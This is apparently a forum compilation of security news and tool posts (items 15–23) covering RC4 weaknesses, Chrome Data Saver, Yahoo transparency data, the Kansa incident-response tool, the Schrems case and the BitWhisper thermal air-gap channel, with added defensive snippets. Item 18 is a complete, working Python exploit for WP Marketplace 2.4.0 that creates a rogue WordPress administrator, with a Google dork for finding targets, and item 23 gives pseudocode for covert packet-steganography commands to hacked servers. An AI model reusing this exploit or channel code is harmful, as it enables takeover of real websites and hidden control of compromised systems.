Hanging in the balance is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source
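An added illustration, not part of the article or of either research paper: the article says some RC4 keystream bytes are predictable and that the attacks need many encryptions of the same data. The sketch below measures the long-published bias of RC4's second keystream byte toward zero, which is a simpler bias than the ones the papers rely on. The sample message, seed and trial count are constructed for the demonstration.

```python
"""RC4's second keystream byte is biased toward 0x00: a small-scale measurement."""
import random


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key scheduling (KSA) followed by n bytes of output (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_encrypt(key: bytes, data: bytes) -> bytes:
    """XOR the data with the keystream (encryption and decryption are the same)."""
    return bytes(p ^ k for p, k in zip(data, rc4_keystream(key, len(data))))


# Constructed sample: one fixed message, encrypted repeatedly under fresh random keys.
SAMPLE_MESSAGE = b"GET / HTTP/1.1"


def second_byte_histogram(message: bytes, trials: int, seed: int = 2015) -> list:
    """Count the values taken by the second ciphertext byte over many random 128-bit keys."""
    rng = random.Random(seed)  # seeded so the measurement is repeatable
    counts = [0] * 256
    for _ in range(trials):
        key = rng.getrandbits(128).to_bytes(16, "big")
        counts[rc4_encrypt(key, message[:2])[1]] += 1
    return counts


def summarize(message: bytes, trials: int) -> dict:
    """Compare the observed counts with what an unbiased cipher would give."""
    counts = second_byte_histogram(message, trials)
    return {
        # An ideal cipher would show every value about trials/256 times.
        "uniform_expectation": trials / 256,
        # Keystream byte 2 is 0x00 about twice as often as it should be, so the
        # true plaintext byte shows through in the ciphertext about twice as often.
        "count_for_true_byte": counts[message[1]],
        "most_common_ciphertext_byte": max(range(256), key=counts.__getitem__),
        "true_plaintext_byte": message[1],
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_MESSAGE, 40000))
```

No key is ever recovered here; the leak comes purely from repetition, which is why the recommended fix is removing RC4 from the negotiated cipher suites rather than rotating keys more often.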
  15. Google wants to save its users' bandwidth at home. The company has released a "Data Saver extension for Chrome," bringing its data compression feature to its desktop users for the first time. While tethering to a mobile Hotspot for Internet connection for your laptop, this new Data Saver extension for Chrome helps you reduce bandwidth usage by compressing the pages you visit over the Internet. If you are unaware of it, the data compression proxy service by Google is designed to save users' bandwidth, load pages faster, and increase security (by checking for malicious web pages) on your smartphones and tablets. REDUCE AS MUCH AS 50% OF DATA USAGE Until now, the data compression service has been meant to benefit only mobile users, but the latest Data Saver Chrome Extension aims at helping desktop users by reducing their data usage by as much as 50 percent. When you visit a website, the web server delivers the requested files to your browser. If enabled by the server, Gzip compresses web pages and style sheets before sending them over to the browser. Gzip compression drastically reduces transfer time since the files are much smaller. Data Saver Extension for Chrome checks if the website you visited has gzip enabled or not. If not, it compresses the requested web page via Google Data Compression proxy and makes it significantly smaller. AVAILABLE FOR CHROME 41 AND HIGHER The Data Saver Chrome extension currently doesn't support secure SSL pages or incognito pages, and Google notes that users may experience issues when they have enabled the extension. Data Saver is available on Chrome both for Android as well as iOS. Users will need Chrome 41 or a higher version to use the extension. As soon as you install it, the extension starts to work by default. In case you want to disable it, click on the Data Saver icon in the menu bar and select "Turn Off Data Saver." 
You can now download Google's new Data Saver extension for Chrome, which is currently in beta version, from the Chrome Web Store. The extension was released on March 23, without any announcement from the search engine giant. Source
  16. Yahoo received nearly 5,000 requests for user data from the United States government in the last six months of 2014 and disclosed some content in nearly 25 percent of those cases. The company said in its new transparency report that it received between 0-999 National Security Letters from the U.S. government, too. The latest report from Yahoo on government requests covers the period of July through December of 2014 and the company reported 4,865 total requests from the U.S. during that period. Those requests covered a total of 9,752 user accounts and the company disclosed some content in 1,157 of those cases. Yahoo rejected 258 of the U.S. government’s requests and disclosed solely non-content data in 2,887 cases. Yahoo defines non-content data as “the information captured at the time of registration such as an alternate e-mail address, name, location, and IP address, login details, billing information, and other transactional information”. The U.S. was by far the most active government in this report, with Taiwan coming in a distant second with 2,081 total requests. Germany sent 1,910 requests to Yahoo and the United Kingdom sent 1,570. In the previous six months, the U.S. sent 6,791 total requests to Yahoo and the company reported the same range of NSLs, 0-999. The government only allows companies to report the number of NSLs they receive in bands of 1,000. Yahoo and other technology companies have been pressuring the government for the ability to report those letters in more specific detail. In addition to the transparency data, Yahoo also provided an update on its efforts to protect users from attacks by governments and other attackers. “We’ve encrypted many of our most important products and services to protect against snooping by governments or other actors. 
This includes encryption of the traffic moving between Yahoo data centers; making browsing over HTTPS the default on Yahoo Mail and Yahoo Homepage; and implementing the latest in security best-practices, including supporting TLS 1.2, Perfect Forward Secrecy and a 2048-bit RSA key for many of our global properties such as Homepage, Mail and Digital Magazines. We’ve also rolled out an end-to-end (e2e) encryption extension for Yahoo Mail, now available on GitHub. Our goal is to provide an intuitive e2e encryption solution for all of our users by the end of 2015,” the company said in the report. Yahoo released the end-to-end encryption extension last week, something that was the result of an effort that Alex Stamos, the company’s CISO, announced at Black Hat last year. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo, like its counterparts at Google, has been investing in encrypting more and more of its services and infrastructure. Much of this has come in the wake of the Edward Snowden revelations, but some of the efforts were in motion before the leaks about NSA capabilities against the companies’ services began to surface. Source
  17. Aerosol

    Kansa

    A modular incident response framework in Powershell. Note there's a bug that's currently cropping up in PowerShell version 2 systems, but version 3 and later should be fine.

    More info: trustedsignal -- blog: Kansa PowerShell Magazine » Kansa: A PowerShell-based incident response framework

    What does it do?

    It uses Powershell Remoting to run user contributed, ahem, user contributed modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline.

    How do you use it?

    Here's a very simple command line example you can run on your own local host. After downloading the project and unzipping it, you'll likely need to "unblock" the ps1 files. The easiest way to do this if you're using Powershell v3 or later is to cd to the directory where Kansa resides and do:

        ls -r *.ps1 | Unblock-File

    If you're not running PS v3 or later, Sysinternal's Streams utility can be used to remove the alternate data streams that Powershell uses to determine if files came from the Internet. Once you've removed those ADSes, you'll be able to run the scripts without issue. I've not run into any issues running the downloaded scripts via Windows Remote Management / Powershell Remoting through Kansa, so you shouldn't have to do anything if you want to run the scripts via remoting.

    Open an elevated Powershell Prompt (Right-click Run As Administrator). At the command prompt, enter:

        .\kansa.ps1 -Target localhost -ModulePath .\Modules -Verbose

    The script should start collecting data or you may see an error about not having Windows Remote Management enabled. If so, do a little searching online, it's easy to turn on. Turn it on and try again. When it finishes running, you'll have a new Output_timestamp subdirectory, with subdirectories for data collected by each module. You can cd into those subdirectories and check out the data.

    There are some analysis scripts in the Analysis directory, but many of those won't make sense on a collection of data from a single host. Kansa was written for collection and analysis of data from dozens, hundreds, thousands, tens of thousands of systems.

    Running Modules Standalone

    Kansa modules can be run as standalone utilities outside of the Kansa framework. Why might you want to do this? Consider netstat -naob, the output of the command line utility is ugly and doesn't easily lend itself to analysis. Running Modules\Net\Get-Netstat.ps1 as a standalone script will call netstat -naob, but it will return Powershell objects in an easy to read, easy to analyze format. You can easily convert its output to CSV, TSV or XML using normal Powershell cmdlets. Here's an example:

        .\Get-Netstat.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation | % { $_ -replace "`"" } | Set-Content netstat.tsv

    The result of the above will be a file called netstat.tsv containing unquoted, tab-separated values for netstat -naob's output.

    Caveats: Powershell relies on the Windows API. Your adversary may use subterfuge.* Collectors can be written to bypass the Windows API as well. Get-RekallPslist.ps1 for example.

    Link: https://github.com/davehull/Kansa
  18.
#!/usr/bin/python
#
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
#
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
#
# Exploit written by Claudio Viviani
#
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
#
# function ajaxinit(){
#     if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
#         if(function_exists($_POST['execute']))
#             call_user_func($_POST['execute'],$_POST);
#         else
#             echo __("function not defined!","wpmarketplace");
#         die();
#     }
# }
#
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
#
#     if (function_exists($_POST['execute']))
#         call_user_func($_POST['execute'], $_POST);
#     else
#     ...
#     ...
#     ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
# (mixed) (required) An array of user data, stdClass or WP_User object.
# Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wpmarketplace"
#
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

banner = """
    WP Marketplace R3m0t3 C0d3 Ex3cut10n
          (Add WP Admin) v2.4.0

          Written by:

        Claudio Viviani

      http://www.homelab.it

         info@homelab.it
     homelabit@protonmail.ch

 https://www.facebook.com/homelabit
 https://twitter.com/homelabit
 https://plus.google.com/+HomelabIt1/
 https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

username = id_generator()
pwd = id_generator()

body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

print "[+] Tryng to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()

    if html == "":
        print("[!] Account Added")
        print("[!] Location: "+host+"/wp-login.php")
        print("[!] Username: "+username)
        print("[!] Password: "+pwd)
    else:
        print("[X] Exploitation Failed :(")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))

Source
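An added detection sketch, not part of the post or of the plugin: it triages captured POST bodies for calls into the `wpmp_pp_ajax_call` dispatcher quoted in the exploit header, on a site that has not yet removed or updated the plugin. The log records, addresses and the allow-listed callback name `wpmp_example_callback` are constructed assumptions; fill the allow-list from your own install.

```python
"""Triage captured POST bodies for calls into the wpmp_pp_ajax_call dispatcher."""
from urllib.parse import parse_qsl

HOOK_ACTION = "wpmp_pp_ajax_call"

# Hypothetical allow-list (assumption): callbacks this site expects the plugin
# to dispatch. The post does not list the plugin's legitimate callbacks.
EXPECTED_CALLBACKS = {"wpmp_example_callback"}


def post_fields(body: str) -> dict:
    """Decode a form body roughly as PHP fills $_POST: percent-decoding,
    '+' as space, and the last value wins when a name is repeated."""
    fields = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        fields[name] = value
    return fields


def classify(body: str) -> str:
    """Return 'ignore', 'expected', 'suspicious' or 'critical' for one POST body."""
    fields = post_fields(body)
    # The handler compares 'action' with ==, so only the exact decoded value reaches it.
    if fields.get("action") != HOOK_ACTION:
        return "ignore"
    # PHP resolves function names case-insensitively, so normalise before comparing.
    callback = fields.get("execute", "").strip().lower()
    if callback in EXPECTED_CALLBACKS:
        return "expected"
    # The request shape documented in the post: account creation with the admin role.
    if callback == "wp_insert_user" and fields.get("role") == "administrator":
        return "critical"
    # Anything else handed to call_user_func() is outside the allow-list.
    return "suspicious"


def scan(records: list) -> list:
    """Return findings for records that are neither ignorable nor expected.
    Only field names are kept, so submitted passwords never land in the alert."""
    findings = []
    for rec in records:
        verdict = classify(rec["body"])
        if verdict in ("critical", "suspicious"):
            fields = post_fields(rec["body"])
            findings.append({
                "ts": rec["ts"],
                "src": rec["src"],
                "path": rec["path"],
                "verdict": verdict,
                "callback": fields.get("execute", "").strip().lower(),
                "field_names": sorted(fields),
            })
    return findings


# Constructed sample records (documentation address ranges, invented timestamps).
SAMPLE_REQUESTS = [
    {"ts": "2015-03-20T10:01:02Z", "src": "192.0.2.10", "path": "/",
     "body": "s=backup+software"},
    {"ts": "2015-03-20T10:04:41Z", "src": "198.51.100.7", "path": "/",
     "body": "action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser"
             "&user_pass=NewAdminPassword&role=administrator"},
    # Same request with percent-encoding and different letter case; PHP treats it identically.
    {"ts": "2015-03-20T10:04:55Z", "src": "198.51.100.7", "path": "/?p=12",
     "body": "action=wpmp%5Fpp%5Fajax%5Fcall&execute=WP_Insert_User&user_login=x"
             "&user_pass=y&role=administrator"},
    {"ts": "2015-03-20T10:09:13Z", "src": "192.0.2.44", "path": "/shop/",
     "body": "action=wpmp_pp_ajax_call&execute=wpmp_example_callback&item=3"},
    {"ts": "2015-03-20T10:12:30Z", "src": "203.0.113.5", "path": "/",
     "body": "action=wpmp_pp_ajax_call&execute=unlisted_function"},
    # A different action never reaches the vulnerable branch, whatever 'execute' says.
    {"ts": "2015-03-20T10:15:00Z", "src": "192.0.2.10", "path": "/wp-admin/admin-ajax.php",
     "body": "action=heartbeat&execute=wp_insert_user"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

A "critical" hit is a reason to audit the site's administrator accounts for ones nobody created on purpose; the same allow-list idea, applied inside the handler instead of `function_exists()`, is the code-level fix.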
  19. Product Description Easy Backup Software for Laptops and PCs A reliable and easy-to-use backup software for home users to back up photos, music, videos, documents, emails, etc. Affordable yet Powerful – fast, safe and easy, only 50% of the price of competitors. Easy to Install and Simple to Use – intuitive interface guiding you step-by-step. Recommended by many famous websites – wins a lot of awards from PC World, Cnet, Softpedia, ToptenREVIEWS, etc. Reliable and Secure – back up any crucial data and protect them in a safe way. It is an advanced and reliable data backup & system disaster recovery software for home desktops and laptops. It enables users to perform backup operation oriented on complete system & file backup to fully protect important data with comprehensive differential/incremental backup and fast system snapshot. Backup Features Backup system – one-click system backup. Back up entire system state (operation system and installed applications) on-the-fly without interrupting Windows work. Backup all files – network shared files, specified files & folders and different kinds of file types can be full or selectively backed up. Outlook backup and restore – backs up of all your email messages in Outlook and save them in a safe way, so you always can access them, especially when you accidentally delete emails. Backup certain file type in specified folder – allows you to specify one file type to backup in certain folder, avoiding monotonous and boring manual efforts. Add Network-attached storage – just one time to add Network – attached Storage (NAS) as the destination, and enjoy the convenience of easy backup process forever. New! Backup data including contacts, messages, call logs, documents, music, photos, videos in Android device. Recovery Benefit Specified file recovery – Directly recover individual files from disk/partition backup image, no need to recover the whole image for saving much disk space and time. 
System migration – fast, easy and safely migrate system to a SSD without reinstalling windows. System Snapshot – take a snapshot of the current system for fast system recovery from crashed/failed system. Disk & partition recovery – fast recover the whole hard disk, partition, dynamic volume or GPT disk to original or different hardware to upgrade & migrate hard disk. New! Recover data including contacts, messages, call logs, documents, music, photos, videos in Android device. Special Benefits Copy to cloud for double protection of data. Clone disk for hard drive upgrade (GPT disk included). Explore backup image file in Windows Explorer. Automatically delete old images to save disk space. -> Download <-
  20. Product Description CloudBerry Box provides bi-directional synchronization of data across remote computers. Synchronization between end-points is performed through your cloud storage account. No 3rd party services involved into data processing. Sync local content on several computers. All changes automatically apply across all end-points Use your own cloud storage account to synchronize data on remote computers. Amazon S3, Microsoft Azure, Google Cloud, Rackspace and other. Download and install CloudBerry Box on all computers you want to synchronize. Set up your cloud storage account and specify local folder to store synchronized data on each of the machines. All changes made to the folder and contents will be automatically uploaded to the cloud and applied to all computers sharing access to the cloud storage account. All data moves through direct connections between end-points and your cloud storage account. No 3rd party web services involved in data transfers or processing. -> Download <-
  21. The European Court of Justice (ECJ) has begun hearing evidence in a case relating to Facebook, PRISM and the ownership of online data that could have far-reaching consequences for data protection and EU-US relations. The case was passed to the ECJ by the Irish courts last summer after Austrian privacy campaigner Max Schrems brought a claim against Facebook saying that it had passed information on users to the US National Security Agency (NSA). The allegations came to light as part of the fallout from the PRISM campaign that was leaked by NSA whistleblower Edward Snowden. Schrems argues that Facebook passing on data from European citizens contravenes ‘safe harbour’ principles that should keep such data in the EU. “Large internet companies (in the current case Facebook) have, pursuant to US law, allowed the US government to access European user data on a mass scale for law enforcement, espionage and anti-terror purposes,” he wrote on the Europe-vs-Facebook page set up to cover the trial. “Aiding these forms of US ‘mass surveillance’ may, however, violate EU privacy laws and fundamental rights.” Specifically the problem is that the safe harbour safeguards require US companies to 'self-certify' that data will be protected when taken outside the US. This system has always been criticised, and the PRISM revelations have only proved these fears correct in the eyes of campaigners like Schrems. "Under EU law such a 'data export' to a third country is only legal if the exporting company (in this case Facebook Ireland Ltd) can ensure an 'adequate protection' for such data in the US," Schrems said in his European Court of Justice hears NSA/PRISM case document (PDF). "In the current case, the plaintiff claims that the NSA’s PRISM programme and other forms of US surveillance are the exact antithesis of 'adequate protection'." 
The case was referred to the ECJ after a judge in Ireland said there was a requirement for the EU to rule on whether Facebook’s actions were in breach of the law. "The monitoring of global communications - subject, of course, to key safeguards - is accordingly regarded essential if the US is to discharge the mandate which it has assumed," said Judge Desmond Hogan last year. "But there may also be suspicion in some quarters that this type of surveillance has had collateral objects and effects, including the preservation and reinforcing of American global political and economic power." Facebook is the company involved in this case, but the outcome will have far-reaching consequences for the relationship between US technology companies with a major presence in Europe, such as Microsoft and Google. If the ECJ sides with Schrems it could see the entire safe harbour agreement thrown out and new rules brought in to give European citizens more privacy and protection from US authorities. This will, in turn, cause tension between the US security agencies and US technology firms, as data from these companies is key to surveillance operations. The US is already attempting to force Microsoft to hand over data stored on servers overseas, claiming that as a US company it is still subject to US laws, even when operating outside the country. If this challenge proves successful there will be even less protection for EU citizens to keep their data secure, although it could also open the market for European cloud providers to offer services without US interference. Source
  22. Air-gapped systems, which are isolated from the Internet and are not connected to other systems that are connected to the Internet, are used in situations that demand high security because they make siphoning data from them difficult. Air-gapped systems are used in classified military networks, the payment networks that process credit and debit card transactions for retailers, and in industrial control systems that operate critical infrastructure. Even journalists use them to prevent intruders from remotely accessing sensitive data. To siphon data from an air-gapped system generally requires physical access to the machine, using removable media like a USB flash drive or a firewire cable to connect the air-gapped system directly to another computer. But security researchers at Ben Gurion University in Israel have found a way to retrieve data from an air-gapped computer using only heat emissions and a computer’s built-in thermal sensors. The method would allow attackers to surreptitiously siphon passwords or security keys from a protected system and transmit the data to an internet-connected system that’s in close proximity and that the attackers control. They could also use the internet-connected system to send malicious commands to the air-gapped system using the same heat and sensor technique. In a video demonstration produced by the researchers, they show how they were able to send a command from one computer to an adjacent air-gapped machine to re-position a missile-launch toy the air-gapped system controlled. The proof-of-concept attack requires both systems to first be compromised with malware. And currently, the attack allows for just eight bits of data to be reliably transmitted over an hour—a rate that is sufficient for an attacker to transmit brief commands or siphon a password or secret key but not large amounts of data. 
It also works only if the air-gapped system is within 40 centimeters (about 15 inches) from the other computer the attackers control. But the researchers, at Ben Gurion’s Cyber Security Labs, note that this latter scenario is not uncommon, because air-gapped systems often sit on desktops alongside Internet-connected ones so that workers can easily access both.

The method was developed by Mordechai Guri, Gabi Kedma and Assaf Kachlon and overseen by their adviser Yuval Elovici. The research represents just a first step, says Dudu Mimran, chief technology officer at the lab, who says they plan to present their findings at a security conference in Tel Aviv next week and release a paper describing their work later on. “We expect this pioneering work to serve as the foundation of subsequent research, which will focus on various aspects of the thermal channel and improve its capabilities,” the researchers note in their paper. With additional research, they say they may be able to increase the distance between the two communicating computers and the speed of data transfer between them.

In their video demonstration, they used one computer tower to initiate a command to an adjacent computer tower representing an air-gapped system. But future research might involve using the so-called internet of things as an attack vector—an internet-connected heating and air conditioning system or a fax machine that’s remotely accessible and can be compromised to emit controlled fluctuations in temperature.

How It Works

Computers produce varying levels of heat depending on how much processing they’re doing. In addition to the CPU, the graphics-processing unit and other motherboard components produce significant heat as well. A system that is simultaneously streaming video, downloading files and surfing the internet will consume a lot of power and generate heat.
To monitor the temperature, computers have a number of built-in thermal sensors to detect heat fluctuations and trigger an internal fan to cool the system off when necessary or even shut it down to avoid damage. The attack, which the researchers dubbed BitWhisper, uses these sensors to send commands to an air-gapped system or siphon data from it. The technique works a bit like Morse code, with the transmitting system using controlled increases of heat to communicate with the receiving system, which uses its built-in thermal sensors to then detect the temperature changes and translate them into a binary “1” or “0.” To communicate a binary “1” in their demonstration for example, the researchers increased the heat emissions of the transmitting computer by just 1 degree over a predefined timeframe. Then to transmit a “0” they restored the system to its base temperature for another predefined timeframe. The receiving computer, representing the air-gapped system, then translated this binary code into a command that caused it to reposition the toy missile launcher. The researchers designed their malware to take into consideration normal temperature fluctuations of a computer and distinguish these from fluctuations that signal a system is trying to communicate. And although their malware increased the temperature by just one degree to signal communication, an attacker could increase the temperature by any amount as long as it’s within reason, to avoid creating the suspicion that can accompany an overactive computer fan if the computer overheats. Communication can also be bi-directional with both computers capable of transmitting or receiving commands and data. The same method, for example, could have been used to cause their air-gapped system to communicate a password to the other system. 
The malware on each system can be designed to search for nearby PCs by instructing an infected system to periodically emit a thermal ping—to determine, for example, when a government employee has placed his infected laptop next to a classified desktop system. The two systems would then engage in a handshake, involving a sequence of “thermal pings” of +1C degrees each, to establish a connection. But in situations where the internet-connected computer and the air-gapped one are in close proximity for an ongoing period, the malware could simply be designed to initiate a data transmission automatically at a specified time—perhaps at midnight when no one’s working to avoid detection—without needing to conduct a handshake each time.

The time it takes to transmit data from one computer to another depends on several factors, including the distance between the two computers and their position and layout. The researchers experimented with a number of scenarios—with computer towers side-by-side, back-to-back and stacked on top of each other. The time it took them to increase the heat and transmit a “1” varied between three and 20 minutes depending. The time to restore the system to normal temperature and transmit a “0” usually took longer.

Other Air-Gap Hacking Techniques

This isn’t the only way to communicate with air-gapped systems without using physical media. Past research by other teams has focused on using acoustic inaudible channels, optical channels and electromagnetic emissions. All of these, however, are unidirectional channels, meaning they can be used to siphon data but not send commands to an air-gapped system. The same Ben Gurion researchers previously showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone.
That proof-of-concept hack involved radio signals generated and transmitted by an infected machine’s video card, which could be used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The NSA reportedly has been using a more sophisticated version of this technique to not only siphon data from air-gapped machines in Iran and elsewhere but also to inject them with malware, according to documents leaked by Edward Snowden. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the agency can extract data from targeted systems using RF signals and transmit it to a briefcase-sized relay station up to 8 miles away. There’s no evidence yet that the spy agency is using heat emissions and thermal sensors to steal data and control air-gapped machines— their RF technique is much more efficient than thermal hacking. But if university researchers in Israel have explored the idea of thermal hacking as an attack vector, the NSA has likely considered it too. Source
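The signalling described in the article (a rise of about 1 degree held for minutes, then a return to base temperature) leaves a recognisable shape in a sensor log. The Python below is an added example, not the researchers' code: it flags a per-minute temperature trace that shows several such plateaus while the host's own CPU load stays low. The sample traces, the thresholds and the load heuristic are constructed assumptions.

```python
from statistics import mean, median

# Constructed sample: one reading per minute, idle temperature about 40 C.
TEMPS = [40.0, 40.1, 39.9, 40.0, 41.0, 41.1, 40.9, 41.0, 41.0, 40.0, 40.1,
         40.0, 39.9, 41.0, 41.0, 41.1, 40.9, 40.0, 40.0, 40.1, 41.1, 41.0,
         41.0, 40.9, 40.0, 40.0]
IDLE_LOAD = [3.0] * len(TEMPS)                      # CPU % while nothing runs
BUSY_LOAD = [85.0 if 4 <= i <= 8 or 13 <= i <= 16 or 20 <= i <= 23 else 3.0
             for i in range(len(TEMPS))]            # heat explained by own work


def smooth(temps, width=3):
    """Median-filter the trace so single-sample sensor jitter is ignored."""
    half = width // 2
    return [median(temps[max(0, i - half): i + half + 1])
            for i in range(len(temps))]


def find_plateaus(temps, baseline, step=1.0, tol=0.4, min_len=3):
    """Return (first, last) indexes of each stretch where the smoothed
    temperature holds about `step` degrees above `baseline` for at least
    `min_len` samples (the article reports 3 to 20 minutes per bit)."""
    plateaus, start = [], None
    for i, t in enumerate(smooth(temps) + [baseline]):   # sentinel ends a trailing plateau
        raised = abs((t - baseline) - step) <= tol
        if raised and start is None:
            start = i
        elif not raised and start is not None:
            if i - start >= min_len:
                plateaus.append((start, i - 1))
            start = None
    return plateaus


def unexplained_plateaus(temps, loads, baseline, max_load=10.0):
    """Keep only plateaus during which this host's CPU load stayed low,
    meaning the extra heat did not come from its own workload."""
    return [(a, b) for a, b in find_plateaus(temps, baseline)
            if mean(loads[a:b + 1]) <= max_load]


def is_suspicious(temps, loads, min_plateaus=3):
    """Flag a trace with several low-load plateaus; baseline is assumed to be
    the lowest smoothed reading in the window."""
    baseline = min(smooth(temps))
    return len(unexplained_plateaus(temps, loads, baseline)) >= min_plateaus


if __name__ == "__main__":
    print("plateaus:", find_plateaus(TEMPS, 40.0))
    print("idle host flagged:", is_suspicious(TEMPS, IDLE_LOAD))
    print("busy host flagged:", is_suspicious(TEMPS, BUSY_LOAD))
```
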
  23. The Packet

Let's look at the packet. That's the thing that makes the internet work, lots of data goes on those, anywhere from 20 bytes to 65335 bytes. However, in practice packets are usually around 600 bytes in size. That data stores a lot of info; some is redundant, some is needed, and some is 0'd out. There's a header, a body, extra space, and then error check and footer. It's actually kind of easy to end up with a couple screwed up bits in a packet (obviously not every packet is screwed up, but it's not 1 out of every million either).

Changing a little bit of the Packet

What packet steganography is about is changing a couple of bits over a couple of packets. Similar to image steganography, it's almost impossible to detect (in small quantities) (assuming feds are downloading all the data) as packets are not known to all be made equally. I'm going to quickly give an example. Game A wants to send packet

[00010101010001000010101010...000010101011000101...]

to Game Server 3. However, you can copy that packet and then resend a slightly modified one, which will look like:

[00010101010001000010101010...111110101001001000...]

Since a massive amount of data is constantly being sent back and forth from the server to you, the packets can be modified a decent amount so information is carried, but one doesn't have to break the checksum by modifying too many bytes. Multiply 40 bits over a couple thousand packets, and a decent amount of data can be sent covertly from you to the server.

What's the best part of this? If you hack servers that get a lot of traffic, it's almost impossible to tell who sent what modded packets to the server even if all of the data is logged because every single packet appears to be legitimate. While there is a decent amount of modded data transferred you can't just go and start downloading ripped movies with this. The point of packet steganography isn't to anonymize your downloads, but to send little messages over networks that won't be found by normal means. Obviously, if person A tries to send messages to person B, A won't send them directly. Instead, he could keep them in an encrypted part of a server. When person B wants to see the message, he unlocks the message by passing the correct key.

Pseudocode example using MS

Maplestory packets are nice, because they used to be pretty obvious as to what was going on. After the packet header came the data of A) what action you were doing and (if a message) what the message was. The message was in plaintext hexadecimal format. Using the code below, we are going to edit a little character of every single message. To anyone looking at the packet it still appears to be a normal message, just with a small typing error. However, to the server and to you, the message really is no longer a message anymore. It's a specific set of instructions. The first couple of whispers to some random person validates to the server that you are the IP to grab the packets from. The final whisper (or packet) the server sees is a specific command to the server. It could be wipe the program on it, it could be tell these servers to do x, y, and z, or it could just be telling the server that there is going to be a new pattern to look out for, and at what certain time.
Code for your side:

    public class Whatever {
        //obviously it depends for whatever server you hacked into, and what app communicates with the server, but for now lets pretend we hacked into a maplestory server
        //cool thing about MS is that the packets are pretty easy to understand
        //yes I realize I am turning Java into a scripting language below, but w/e
        public void initContact() {
            for(int i=0; i<10; i++){
                String x=scan.grabPacket();
                x=x.substring(0,12)+Integer.toHexString(i)+Integer.toHexString(i)+x.substring(14,x.length());
                XClass.sendPacket(x);
                //totally possible if string x winds up being a valid packet, which it is since it's just hex
                //obviously you have to make a sendPacket method
                if(scan.nextPacket.equals(neededPacket))
                    XClass.sendPacket(endPacket(Action, Type, IP, Add_Instruct));
                else
                    System.out.println("Connection was unable to be made");
            }
        }

        public String endPacket(String x1, String x2, String x3, String x4){
            return grabHeader() + " 3A BB 0C FF 2D "+mod(x1)+" "+mod(x2)+" 3C "+mod(x3)+" 85 26 "+mod(x4)+grabFooter();
        }
    }

Code for the server (the server is not constantly loading all packets, it only works for a specific amount of time):

    import everything2.etc
    //you have to watch out the data storage for this one
    class ServerInner{
        public void acceptEverything() {
            //kills program in 2 minutes
            long num = 2 * 60 * 1000; //min*sec*milli
            Timer t = new Timer();
